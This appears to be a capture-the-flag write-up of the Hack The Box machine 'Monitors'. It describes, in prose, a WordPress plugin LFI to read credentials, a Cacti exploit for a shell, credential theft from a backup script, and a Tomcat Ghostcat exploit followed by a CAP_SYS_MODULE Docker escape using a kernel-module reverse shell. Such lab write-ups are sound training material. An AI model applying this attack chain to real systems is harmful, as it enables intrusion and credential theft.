Monitors is an Hard box from HTB and created by TheCyberGeek. This box features a WordPress plugin exploit via wp-with-spritz allowing for LFI/RFI and an internal docker with Apache Tomcat running. I begin each box by running a RustScan. This is bundled into my setup.sh script which I’ve mentioned in a few of my other posts. Running RustScan with NMAP filters shows a website available on Port 80. The website states ‘Sorry, direct IP access is not allowed’ but provides an admin contact detail.

[email protected] email address.

I edit my host file and add in monitors.htb.

Navigating over to the domain I see a WordPress website. Reviewing the page I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out of date WordPress.

Well the scan is running I notice that wp-with-spritz has been detected and its last update was 2015.

wp-with-spritz coming up as 2015 being the last update.

A short search later shows me an entry from ExploitDB – 44544 which shows an LFI/RFI available for the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.

Next I used the LFI (Local File Inclusion) exploit to pull the WP-Config file. WP-Config file stores the database credentials for a WordPress installation. I viewed it in source as it tends to look cleaner then the static viewing.

wp-config.cfg file running in source.

I try the credentials to login to the WordPress admin but it doesn’t work. I check around a few locations for the next point of escalation. I review NMAP and realize the machine is running Apache/2.4.29. I navigate to the 000-default.conf to see if the page we saw earlier can give us any additional information or if any other hosts exists.

Running Apache/2.4.29

An additional VHOST is available.

I add the new host in my hosts file and navigate over to the new sub-domain. I try the credentials found earlier in the WP-Config file and log in. It took me a second as I needed to use admin for the username and not wpadmin.

I navigate around the console looking for a file upload or script option. Next I check the version which is located at the top right of the page.

Cacti 1.2.12

This leads me to ExploitDB – 49810 which I pull to my Attack VM and run. I fill in the required variables and submit the request, giving my a low privilege shell.

ExploitDB – 49810 running successfully.

After getting onto the machine and upgrading my shell I tried to use curl or WGET to pull files to the box and was unable to do so as they were both not installed. Using nc I pulled Linenum to the box.

Going through the endless string of results I notice cacti-backup.service. I also notice that the user marcus who I was trying to escalate too had a .backup directory.

.backup directory in Marcus’ home directory and

cacti-backup.service running on the machine.

Reviewing the cacti-backup.service I can see that the .backup folder m entioned earlier has a shell script inside the directory. Trying to view it gives me his credentials. I su to his account, grab the flag and try ssh.

cacti-backup.service showing a backup script running in .backup

and the password for Marcus in backup.sh

I login with SSH and read the note –

This must be a clue to how I progress. I check services running looking for a docker installation. I notice Port 8443 open which wasn’t visible on the original scan. I use SSH to forward the port to my local host.

Port 8443 open on the local host.

Apache Tomcat/9.0.31 running on the local host.

Viewing the page does not give me the exploit I was hoping for but I do notice Apache Tomcat/9.0.31 running which I know is constantly being exploited. A short Google late shows me that a Metasploit module is available.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit

The first I ran the exploit it errored and told me to use ForceExploit to override. Doing this allowed me to get a meterpeter shell.

ForceExploit command used due to local host pivot

After running the exploit I could see I was root of the docker environment. I knew next steps were to escape and escalate. I found this article on hacktricks, hacktricks – Docker Breakout.

Inside the previous output you can see that the SYS_MODULE capability is enabled. Going through the first link lead me to a second article focused full on CAP_SYS_MODULE hacktricks -CAP_SYS_MODDULE. Truthfully this part can be confusing so just follow the article as best you can.

Use the copy command (on the website) to copy reverse-shell.c and Makefile. After the reverse-shell.c on Line 8 and put in your own IP/Port. Make sure when copying the Makefile you tab the blank char before each word. When done launch a web server and pull both files to the machine.

After we run reverse-shell.ko on the docker VM our reverse shell pops and we are root.

Root on Monitors from HTB.